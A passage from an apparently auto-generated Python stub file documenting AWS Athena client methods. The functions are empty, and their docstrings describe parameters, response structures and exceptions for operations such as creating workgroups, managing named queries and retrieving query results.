State (string) --The state of query execution. QUEUED indicates that the query has been submitted to the service, and Athena will execute the query as soon as resources are available. RUNNING indicates that the query is in execution phase. SUCCEEDED indicates that the query completed without errors. FAILED indicates that the query experienced an error and did not complete processing. CANCELLED indicates that a user input interrupted query execution.
StateChangeReason (string) --Further detail about the status of the query.
SubmissionDateTime (datetime) --The date and time that the query was submitted.
CompletionDateTime (datetime) --The date and time that the query completed.
Statistics (dict) --Query execution statistics, such as the amount of data scanned, the amount of time that the query took to process, and the type of statement that was run.
EngineExecutionTimeInMillis (integer) --The number of milliseconds that the query took to execute.
DataScannedInBytes (integer) --The number of bytes in the data that was queried.
DataManifestLocation (string) --The location and file name of a data manifest file. The manifest file is saved to the Athena query results location in Amazon S3. The manifest file tracks files that the query wrote to Amazon S3. If the query fails, the manifest file also tracks files that the query intended to write. The manifest is useful for identifying orphaned files resulting from a failed query. For more information, see Working with Query Results, Output Files, and Query History in the Amazon Athena User Guide .
TotalExecutionTimeInMillis (integer) --The number of milliseconds that Athena took to run the query.
QueryQueueTimeInMillis (integer) --The number of milliseconds that the query was in your query queue waiting for resources. Note that if transient errors occur, Athena might automatically add the query back to the queue.
QueryPlanningTimeInMillis (integer) --The number of milliseconds that Athena took to plan the query processing flow. This includes the time spent retrieving table partitions from the data source. Note that because the query engine performs the query planning, query planning time is a subset of engine processing time.
ServiceProcessingTimeInMillis (integer) --The number of milliseconds that Athena took to finalize and publish the query results after the query engine finished running the query.
WorkGroup (string) --The name of the workgroup in which the query ran.
UnprocessedQueryExecutionIds (list) --Information about the query executions that failed to run.
(dict) --Describes a query execution that failed to process.
QueryExecutionId (string) --The unique identifier of the query execution.
ErrorCode (string) --The error code returned when the query execution failed to process, if applicable.
ErrorMessage (string) --The error message returned when the query execution failed to process, if applicable.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'QueryExecutions': [
{
'QueryExecutionId': 'string',
'Query': 'string',
'StatementType': 'DDL'|'DML'|'UTILITY',
'ResultConfiguration': {
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
'QueryExecutionContext': {
'Database': 'string'
},
'Status': {
'State': 'QUEUED'|'RUNNING'|'SUCCEEDED'|'FAILED'|'CANCELLED',
'StateChangeReason': 'string',
'SubmissionDateTime': datetime(2015, 1, 1),
'CompletionDateTime': datetime(2015, 1, 1)
},
'Statistics': {
'EngineExecutionTimeInMillis': 123,
'DataScannedInBytes': 123,
'DataManifestLocation': 'string',
'TotalExecutionTimeInMillis': 123,
'QueryQueueTimeInMillis': 123,
'QueryPlanningTimeInMillis': 123,
'ServiceProcessingTimeInMillis': 123
},
'WorkGroup': 'string'
},
],
'UnprocessedQueryExecutionIds': [
{
'QueryExecutionId': 'string',
'ErrorCode': 'string',
'ErrorMessage': 'string'
},
]
}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_named_query(Name=None, Description=None, Database=None, QueryString=None, ClientRequestToken=None, WorkGroup=None):
"""
Creates a named query in the specified workgroup. Requires that you have access to the workgroup.
For code samples using the AWS SDK for Java, see Examples and Code Samples in the Amazon Athena User Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.create_named_query(
Name='string',
Description='string',
Database='string',
QueryString='string',
ClientRequestToken='string',
WorkGroup='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe query name.\n
:type Description: string
:param Description: The query description.
:type Database: string
:param Database: [REQUIRED]\nThe database to which the query belongs.\n
:type QueryString: string
:param QueryString: [REQUIRED]\nThe contents of the query with all query statements.\n
:type ClientRequestToken: string
:param ClientRequestToken: A unique case-sensitive string used to ensure the request to create the query is idempotent (executes only once). If another CreateNamedQuery request is received, the same response is returned and another query is not created. If a parameter has changed, for example, the QueryString , an error is returned.\n\nWarning\nThis token is listed as not required because AWS SDKs (for example the AWS SDK for Java) auto-generate the token for users. If you are not using the AWS SDK or the AWS CLI, you must provide this token or the action will fail.\n\nThis field is autopopulated if not provided.\n
:type WorkGroup: string
:param WorkGroup: The name of the workgroup in which the named query is being created.
:rtype: dict
ReturnsResponse Syntax
{
'NamedQueryId': 'string'
}
Response Structure
(dict) --
NamedQueryId (string) --
The unique ID of the query.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'NamedQueryId': 'string'
}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
"""
pass
def create_work_group(Name=None, Configuration=None, Description=None, Tags=None):
"""
Creates a workgroup with the specified name.
See also: AWS API Documentation
Exceptions
:example: response = client.create_work_group(
Name='string',
Configuration={
'ResultConfiguration': {
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
'EnforceWorkGroupConfiguration': True|False,
'PublishCloudWatchMetricsEnabled': True|False,
'BytesScannedCutoffPerQuery': 123,
'RequesterPaysEnabled': True|False
},
Description='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type Name: string
:param Name: [REQUIRED]\nThe workgroup name.\n
:type Configuration: dict
:param Configuration: The configuration for the workgroup, which includes the location in Amazon S3 where query results are stored, the encryption configuration, if any, used for encrypting query results, whether the Amazon CloudWatch Metrics are enabled for the workgroup, the limit for the amount of bytes scanned (cutoff) per query, if it is specified, and whether workgroup\'s settings (specified with EnforceWorkGroupConfiguration) in the WorkGroupConfiguration override client-side settings. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .\n\nResultConfiguration (dict) --The configuration for the workgroup, which includes the location in Amazon S3 where query results are stored and the encryption option, if any, used for query results. To run the query, you must specify the query results location using one of the ways: either in the workgroup using this setting, or for individual queries (client-side), using ResultConfiguration$OutputLocation . If none of them is set, Athena issues an error that no output location is provided. For more information, see Query Results .\n\nOutputLocation (string) --The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/ . To run the query, you must specify the query results location using one of the ways: either for individual queries using either this setting (client-side), or in the workgroup, using WorkGroupConfiguration . If none of them is set, Athena issues an error that no output location is provided. For more information, see Query Results . If workgroup settings override client-side settings, then the query uses the settings specified for the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .\n\nEncryptionConfiguration (dict) --If query results are encrypted in Amazon S3, indicates the encryption option used (for example, SSE-KMS or CSE-KMS ) and key information. This is a client-side setting. If workgroup settings override client-side settings, then the query uses the encryption configuration that is specified for the workgroup, and also uses the location for storing query results specified in the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration and Workgroup Settings Override Client-Side Settings .\n\nEncryptionOption (string) -- [REQUIRED]Indicates whether Amazon S3 server-side encryption with Amazon S3-managed keys (SSE-S3 ), server-side encryption with KMS-managed keys (SSE-KMS ), or client-side encryption with KMS-managed keys (CSE-KMS) is used.\nIf a query runs in a workgroup and the workgroup overrides client-side settings, then the workgroup\'s setting for encryption is used. It specifies whether query results must be encrypted, for all queries that run in this workgroup.\n\nKmsKey (string) --For SSE-KMS and CSE-KMS , this is the KMS key ARN or ID.\n\n\n\n\n\nEnforceWorkGroupConfiguration (boolean) --If set to 'true', the settings for the workgroup override client-side settings. If set to 'false', client-side settings are used. For more information, see Workgroup Settings Override Client-Side Settings .\n\nPublishCloudWatchMetricsEnabled (boolean) --Indicates that the Amazon CloudWatch metrics are enabled for the workgroup.\n\nBytesScannedCutoffPerQuery (integer) --The upper data usage limit (cutoff) for the amount of bytes a single query in a workgroup is allowed to scan.\n\nRequesterPaysEnabled (boolean) --If set to true , allows members assigned to a workgroup to reference Amazon S3 Requester Pays buckets in queries. If set to false , workgroup members cannot query data from Requester Pays buckets, and queries that retrieve data from Requester Pays buckets cause an error. The default is false . For more information about Requester Pays buckets, see Requester Pays Buckets in the Amazon Simple Storage Service Developer Guide .\n\n\n
:type Description: string
:param Description: The workgroup description.
:type Tags: list
:param Tags: One or more tags, separated by commas, that you want to attach to the workgroup as you create it.\n\n(dict) --A tag that you can add to a resource. A tag is a label that you assign to an AWS Athena resource (a workgroup). Each tag consists of a key and an optional value, both of which you define. Tags enable you to categorize workgroups in Athena, for example, by purpose, owner, or environment. Use a consistent set of tag keys to make it easier to search and filter workgroups in your account. The maximum tag key length is 128 Unicode characters in UTF-8. The maximum tag value length is 256 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag keys and values are case-sensitive. Tag keys must be unique per resource.\n\nKey (string) --A tag key. The tag key length is from 1 to 128 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag keys are case-sensitive and must be unique per resource.\n\nValue (string) --A tag value. The tag value length is from 0 to 256 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {}
:returns:
(dict) --
"""
pass
def delete_named_query(NamedQueryId=None):
"""
Deletes the named query if you have access to the workgroup in which the query was saved.
For code samples using the AWS SDK for Java, see Examples and Code Samples in the Amazon Athena User Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_named_query(
NamedQueryId='string'
)
:type NamedQueryId: string
:param NamedQueryId: [REQUIRED]\nThe unique ID of the query to delete.\nThis field is autopopulated if not provided.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
"""
pass
def delete_work_group(WorkGroup=None, RecursiveDeleteOption=None):
"""
Deletes the workgroup with the specified name. The primary workgroup cannot be deleted.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_work_group(
WorkGroup='string',
RecursiveDeleteOption=True|False
)
:type WorkGroup: string
:param WorkGroup: [REQUIRED]\nThe unique name of the workgroup to delete.\n
:type RecursiveDeleteOption: boolean
:param RecursiveDeleteOption: The option to delete the workgroup and its contents even if the workgroup contains any named queries.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {}
:returns:
(dict) --
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_named_query(NamedQueryId=None):
"""
Returns information about a single query. Requires that you have access to the workgroup in which the query was saved.
See also: AWS API Documentation
Exceptions
:example: response = client.get_named_query(
NamedQueryId='string'
)
:type NamedQueryId: string
:param NamedQueryId: [REQUIRED]\nThe unique ID of the query. Use ListNamedQueries to get query IDs.\n
:rtype: dict
ReturnsResponse Syntax{
'NamedQuery': {
'Name': 'string',
'Description': 'string',
'Database': 'string',
'QueryString': 'string',
'NamedQueryId': 'string',
'WorkGroup': 'string'
}
}
Response Structure
(dict) --
NamedQuery (dict) --Information about the query.
Name (string) --The query name.
Description (string) --The query description.
Database (string) --The database to which the query belongs.
QueryString (string) --The SQL query statements that comprise the query.
NamedQueryId (string) --The unique identifier of the query.
WorkGroup (string) --The name of the workgroup that contains the named query.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'NamedQuery': {
'Name': 'string',
'Description': 'string',
'Database': 'string',
'QueryString': 'string',
'NamedQueryId': 'string',
'WorkGroup': 'string'
}
}
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_query_execution(QueryExecutionId=None):
"""
Returns information about a single execution of a query if you have access to the workgroup in which the query ran. Each time a query executes, information about the query execution is saved with a unique ID.
See also: AWS API Documentation
Exceptions
:example: response = client.get_query_execution(
QueryExecutionId='string'
)
:type QueryExecutionId: string
:param QueryExecutionId: [REQUIRED]\nThe unique ID of the query execution.\n
:rtype: dict
ReturnsResponse Syntax{
'QueryExecution': {
'QueryExecutionId': 'string',
'Query': 'string',
'StatementType': 'DDL'|'DML'|'UTILITY',
'ResultConfiguration': {
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
'QueryExecutionContext': {
'Database': 'string'
},
'Status': {
'State': 'QUEUED'|'RUNNING'|'SUCCEEDED'|'FAILED'|'CANCELLED',
'StateChangeReason': 'string',
'SubmissionDateTime': datetime(2015, 1, 1),
'CompletionDateTime': datetime(2015, 1, 1)
},
'Statistics': {
'EngineExecutionTimeInMillis': 123,
'DataScannedInBytes': 123,
'DataManifestLocation': 'string',
'TotalExecutionTimeInMillis': 123,
'QueryQueueTimeInMillis': 123,
'QueryPlanningTimeInMillis': 123,
'ServiceProcessingTimeInMillis': 123
},
'WorkGroup': 'string'
}
}
Response Structure
(dict) --
QueryExecution (dict) --Information about the query execution.
QueryExecutionId (string) --The unique identifier for each query execution.
Query (string) --The SQL query statements which the query execution ran.
StatementType (string) --The type of query statement that was run. DDL indicates DDL query statements. DML indicates DML (Data Manipulation Language) query statements, such as CREATE TABLE AS SELECT . UTILITY indicates query statements other than DDL and DML, such as SHOW CREATE TABLE , or DESCRIBE <table> .
ResultConfiguration (dict) --The location in Amazon S3 where query results were stored and the encryption option, if any, used for query results. These are known as "client-side settings". If workgroup settings override client-side settings, then the query uses the location for the query results and the encryption configuration that are specified for the workgroup.
OutputLocation (string) --The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/ . To run the query, you must specify the query results location using one of the ways: either for individual queries using either this setting (client-side), or in the workgroup, using WorkGroupConfiguration . If none of them is set, Athena issues an error that no output location is provided. For more information, see Query Results . If workgroup settings override client-side settings, then the query uses the settings specified for the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .
EncryptionConfiguration (dict) --If query results are encrypted in Amazon S3, indicates the encryption option used (for example, SSE-KMS or CSE-KMS ) and key information. This is a client-side setting. If workgroup settings override client-side settings, then the query uses the encryption configuration that is specified for the workgroup, and also uses the location for storing query results specified in the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration and Workgroup Settings Override Client-Side Settings .
EncryptionOption (string) --Indicates whether Amazon S3 server-side encryption with Amazon S3-managed keys (SSE-S3 ), server-side encryption with KMS-managed keys (SSE-KMS ), or client-side encryption with KMS-managed keys (CSE-KMS) is used.
If a query runs in a workgroup and the workgroup overrides client-side settings, then the workgroup\'s setting for encryption is used. It specifies whether query results must be encrypted, for all queries that run in this workgroup.
KmsKey (string) --For SSE-KMS and CSE-KMS , this is the KMS key ARN or ID.
QueryExecutionContext (dict) --The database in which the query execution occurred.
Database (string) --The name of the database.
Status (dict) --The completion date, current state, submission time, and state change reason (if applicable) for the query execution.
State (string) --The state of query execution. QUEUED indicates that the query has been submitted to the service, and Athena will execute the query as soon as resources are available. RUNNING indicates that the query is in execution phase. SUCCEEDED indicates that the query completed without errors. FAILED indicates that the query experienced an error and did not complete processing. CANCELLED indicates that a user input interrupted query execution.
StateChangeReason (string) --Further detail about the status of the query.
SubmissionDateTime (datetime) --The date and time that the query was submitted.
CompletionDateTime (datetime) --The date and time that the query completed.
Statistics (dict) --Query execution statistics, such as the amount of data scanned, the amount of time that the query took to process, and the type of statement that was run.
EngineExecutionTimeInMillis (integer) --The number of milliseconds that the query took to execute.
DataScannedInBytes (integer) --The number of bytes in the data that was queried.
DataManifestLocation (string) --The location and file name of a data manifest file. The manifest file is saved to the Athena query results location in Amazon S3. The manifest file tracks files that the query wrote to Amazon S3. If the query fails, the manifest file also tracks files that the query intended to write. The manifest is useful for identifying orphaned files resulting from a failed query. For more information, see Working with Query Results, Output Files, and Query History in the Amazon Athena User Guide .
TotalExecutionTimeInMillis (integer) --The number of milliseconds that Athena took to run the query.
QueryQueueTimeInMillis (integer) --The number of milliseconds that the query was in your query queue waiting for resources. Note that if transient errors occur, Athena might automatically add the query back to the queue.
QueryPlanningTimeInMillis (integer) --The number of milliseconds that Athena took to plan the query processing flow. This includes the time spent retrieving table partitions from the data source. Note that because the query engine performs the query planning, query planning time is a subset of engine processing time.
ServiceProcessingTimeInMillis (integer) --The number of milliseconds that Athena took to finalize and publish the query results after the query engine finished running the query.
WorkGroup (string) --The name of the workgroup in which the query ran.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'QueryExecution': {
'QueryExecutionId': 'string',
'Query': 'string',
'StatementType': 'DDL'|'DML'|'UTILITY',
'ResultConfiguration': {
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
'QueryExecutionContext': {
'Database': 'string'
},
'Status': {
'State': 'QUEUED'|'RUNNING'|'SUCCEEDED'|'FAILED'|'CANCELLED',
'StateChangeReason': 'string',
'SubmissionDateTime': datetime(2015, 1, 1),
'CompletionDateTime': datetime(2015, 1, 1)
},
'Statistics': {
'EngineExecutionTimeInMillis': 123,
'DataScannedInBytes': 123,
'DataManifestLocation': 'string',
'TotalExecutionTimeInMillis': 123,
'QueryQueueTimeInMillis': 123,
'QueryPlanningTimeInMillis': 123,
'ServiceProcessingTimeInMillis': 123
},
'WorkGroup': 'string'
}
}
"""
pass
def get_query_results(QueryExecutionId=None, NextToken=None, MaxResults=None):
"""
Streams the results of a single query execution specified by QueryExecutionId from the Athena query results location in Amazon S3. For more information, see Query Results in the Amazon Athena User Guide . This request does not execute the query but returns results. Use StartQueryExecution to run a query.
To stream query results successfully, the IAM principal with permission to call GetQueryResults also must have permissions to the Amazon S3 GetObject action for the Athena query results location.
See also: AWS API Documentation
Exceptions
:example: response = client.get_query_results(
QueryExecutionId='string',
NextToken='string',
MaxResults=123
)
:type QueryExecutionId: string
:param QueryExecutionId: [REQUIRED]\nThe unique ID of the query execution.\n
:type NextToken: string
:param NextToken: The token that specifies where to start pagination if a previous request was truncated.
:type MaxResults: integer
:param MaxResults: The maximum number of results (rows) to return in this request.
:rtype: dict
ReturnsResponse Syntax
{
'UpdateCount': 123,
'ResultSet': {
'Rows': [
{
'Data': [
{
'VarCharValue': 'string'
},
]
},
],
'ResultSetMetadata': {
'ColumnInfo': [
{
'CatalogName': 'string',
'SchemaName': 'string',
'TableName': 'string',
'Name': 'string',
'Label': 'string',
'Type': 'string',
'Precision': 123,
'Scale': 123,
'Nullable': 'NOT_NULL'|'NULLABLE'|'UNKNOWN',
'CaseSensitive': True|False
},
]
}
},
'NextToken': 'string'
}
Response Structure
(dict) --
UpdateCount (integer) --
The number of rows inserted with a CREATE TABLE AS SELECT statement.
ResultSet (dict) --
The results of the query execution.
Rows (list) --
The rows in the table.
(dict) --
The rows that comprise a query result table.
Data (list) --
The data that populates a row in a query result table.
(dict) --
A piece of data (a field in the table).
VarCharValue (string) --
The value of the datum.
ResultSetMetadata (dict) --
The metadata that describes the column structure and data types of a table of query results.
ColumnInfo (list) --
Information about the columns returned in a query result metadata.
(dict) --
Information about the columns in a query execution result.
CatalogName (string) --
The catalog to which the query results belong.
SchemaName (string) --
The schema name (database name) to which the query results belong.
TableName (string) --
The table name for the query results.
Name (string) --
The name of the column.
Label (string) --
A column label.
Type (string) --
The data type of the column.
Precision (integer) --
For DECIMAL data types, specifies the total number of digits, up to 38. For performance reasons, we recommend up to 18 digits.
Scale (integer) --
For DECIMAL data types, specifies the total number of digits in the fractional part of the value. Defaults to 0.
Nullable (string) --
Indicates the column\'s nullable status.
CaseSensitive (boolean) --
Indicates whether values in the column are case-sensitive.
NextToken (string) --
A token to be used by the next request if this request is truncated.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'UpdateCount': 123,
'ResultSet': {
'Rows': [
{
'Data': [
{
'VarCharValue': 'string'
},
]
},
],
'ResultSetMetadata': {
'ColumnInfo': [
{
'CatalogName': 'string',
'SchemaName': 'string',
'TableName': 'string',
'Name': 'string',
'Label': 'string',
'Type': 'string',
'Precision': 123,
'Scale': 123,
'Nullable': 'NOT_NULL'|'NULLABLE'|'UNKNOWN',
'CaseSensitive': True|False
},
]
}
},
'NextToken': 'string'
}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def get_work_group(WorkGroup=None):
"""
Returns information about the workgroup with the specified name.
See also: AWS API Documentation
Exceptions
:example: response = client.get_work_group(
WorkGroup='string'
)
:type WorkGroup: string
:param WorkGroup: [REQUIRED]\nThe name of the workgroup.\n
:rtype: dict
ReturnsResponse Syntax{
'WorkGroup': {
'Name': 'string',
'State': 'ENABLED'|'DISABLED',
'Configuration': {
'ResultConfiguration': {
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
'EnforceWorkGroupConfiguration': True|False,
'PublishCloudWatchMetricsEnabled': True|False,
'BytesScannedCutoffPerQuery': 123,
'RequesterPaysEnabled': True|False
},
'Description': 'string',
'CreationTime': datetime(2015, 1, 1)
}
}
Response Structure
(dict) --
WorkGroup (dict) --Information about the workgroup.
Name (string) --The workgroup name.
State (string) --The state of the workgroup: ENABLED or DISABLED.
Configuration (dict) --The configuration of the workgroup, which includes the location in Amazon S3 where query results are stored, the encryption configuration, if any, used for query results; whether the Amazon CloudWatch Metrics are enabled for the workgroup; whether workgroup settings override client-side settings; and the data usage limits for the amount of data scanned per query or per workgroup. The workgroup settings override is specified in EnforceWorkGroupConfiguration (true/false) in the WorkGroupConfiguration. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .
ResultConfiguration (dict) --The configuration for the workgroup, which includes the location in Amazon S3 where query results are stored and the encryption option, if any, used for query results. To run the query, you must specify the query results location using one of the ways: either in the workgroup using this setting, or for individual queries (client-side), using ResultConfiguration$OutputLocation . If none of them is set, Athena issues an error that no output location is provided. For more information, see Query Results .
OutputLocation (string) --The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/ . To run the query, you must specify the query results location using one of the ways: either for individual queries using either this setting (client-side), or in the workgroup, using WorkGroupConfiguration . If none of them is set, Athena issues an error that no output location is provided. For more information, see Query Results . If workgroup settings override client-side settings, then the query uses the settings specified for the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .
EncryptionConfiguration (dict) --If query results are encrypted in Amazon S3, indicates the encryption option used (for example, SSE-KMS or CSE-KMS ) and key information. This is a client-side setting. If workgroup settings override client-side settings, then the query uses the encryption configuration that is specified for the workgroup, and also uses the location for storing query results specified in the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration and Workgroup Settings Override Client-Side Settings .
EncryptionOption (string) --Indicates whether Amazon S3 server-side encryption with Amazon S3-managed keys (SSE-S3 ), server-side encryption with KMS-managed keys (SSE-KMS ), or client-side encryption with KMS-managed keys (CSE-KMS) is used.
If a query runs in a workgroup and the workgroup overrides client-side settings, then the workgroup\'s setting for encryption is used. It specifies whether query results must be encrypted, for all queries that run in this workgroup.
KmsKey (string) --For SSE-KMS and CSE-KMS , this is the KMS key ARN or ID.
EnforceWorkGroupConfiguration (boolean) --If set to "true", the settings for the workgroup override client-side settings. If set to "false", client-side settings are used. For more information, see Workgroup Settings Override Client-Side Settings .
PublishCloudWatchMetricsEnabled (boolean) --Indicates that the Amazon CloudWatch metrics are enabled for the workgroup.
BytesScannedCutoffPerQuery (integer) --The upper data usage limit (cutoff) for the amount of bytes a single query in a workgroup is allowed to scan.
RequesterPaysEnabled (boolean) --If set to true , allows members assigned to a workgroup to reference Amazon S3 Requester Pays buckets in queries. If set to false , workgroup members cannot query data from Requester Pays buckets, and queries that retrieve data from Requester Pays buckets cause an error. The default is false . For more information about Requester Pays buckets, see Requester Pays Buckets in the Amazon Simple Storage Service Developer Guide .
Description (string) --The workgroup description.
CreationTime (datetime) --The date and time the workgroup was created.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'WorkGroup': {
'Name': 'string',
'State': 'ENABLED'|'DISABLED',
'Configuration': {
'ResultConfiguration': {
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
'EnforceWorkGroupConfiguration': True|False,
'PublishCloudWatchMetricsEnabled': True|False,
'BytesScannedCutoffPerQuery': 123,
'RequesterPaysEnabled': True|False
},
'Description': 'string',
'CreationTime': datetime(2015, 1, 1)
}
}
"""
pass
def list_named_queries(NextToken=None, MaxResults=None, WorkGroup=None):
"""
Provides a list of available query IDs only for queries saved in the specified workgroup. Requires that you have access to the workgroup. If a workgroup is not specified, lists the saved queries for the primary workgroup.
For code samples using the AWS SDK for Java, see Examples and Code Samples in the Amazon Athena User Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.list_named_queries(
NextToken='string',
MaxResults=123,
WorkGroup='string'
)
:type NextToken: string
:param NextToken: The token that specifies where to start pagination if a previous request was truncated.
:type MaxResults: integer
:param MaxResults: The maximum number of queries to return in this request.
:type WorkGroup: string
:param WorkGroup: The name of the workgroup from which the named queries are returned. If a workgroup is not specified, the saved queries for the primary workgroup are returned.
:rtype: dict
ReturnsResponse Syntax
{
'NamedQueryIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
NamedQueryIds (list) --
The list of unique query IDs.
(string) --
NextToken (string) --
A token to be used by the next request if this request is truncated.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'NamedQueryIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_query_executions(NextToken=None, MaxResults=None, WorkGroup=None):
"""
Provides a list of available query execution IDs for the queries in the specified workgroup. If a workgroup is not specified, returns a list of query execution IDs for the primary workgroup. Requires you to have access to the workgroup in which the queries ran.
For code samples using the AWS SDK for Java, see Examples and Code Samples in the Amazon Athena User Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.list_query_executions(
NextToken='string',
MaxResults=123,
WorkGroup='string'
)
:type NextToken: string
:param NextToken: The token that specifies where to start pagination if a previous request was truncated.
:type MaxResults: integer
:param MaxResults: The maximum number of query executions to return in this request.
:type WorkGroup: string
:param WorkGroup: The name of the workgroup from which queries are returned. If a workgroup is not specified, a list of available query execution IDs for the queries in the primary workgroup is returned.
:rtype: dict
ReturnsResponse Syntax
{
'QueryExecutionIds': [
'string',
],
'NextToken': 'string'
}
Response Structure
(dict) --
QueryExecutionIds (list) --
The unique IDs of each query execution as an array of strings.
(string) --
NextToken (string) --
A token to be used by the next request if this request is truncated.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'QueryExecutionIds': [
'string',
],
'NextToken': 'string'
}
:returns:
(string) --
"""
pass
def list_tags_for_resource(ResourceARN=None, NextToken=None, MaxResults=None):
"""
Lists the tags associated with this workgroup.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
ResourceARN='string',
NextToken='string',
MaxResults=123
)
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nLists the tags for the workgroup resource with the specified ARN.\n
:type NextToken: string
:param NextToken: The token for the next set of results, or null if there are no additional results for this request, where the request lists the tags for the workgroup resource with the specified ARN.
:type MaxResults: integer
:param MaxResults: The maximum number of results to be returned per request that lists the tags for the workgroup resource.
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Tags (list) --
The list of tags associated with this workgroup.
(dict) --
A tag that you can add to a resource. A tag is a label that you assign to an AWS Athena resource (a workgroup). Each tag consists of a key and an optional value, both of which you define. Tags enable you to categorize workgroups in Athena, for example, by purpose, owner, or environment. Use a consistent set of tag keys to make it easier to search and filter workgroups in your account. The maximum tag key length is 128 Unicode characters in UTF-8. The maximum tag value length is 256 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag keys and values are case-sensitive. Tag keys must be unique per resource.
Key (string) --
A tag key. The tag key length is from 1 to 128 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag keys are case-sensitive and must be unique per resource.
Value (string) --
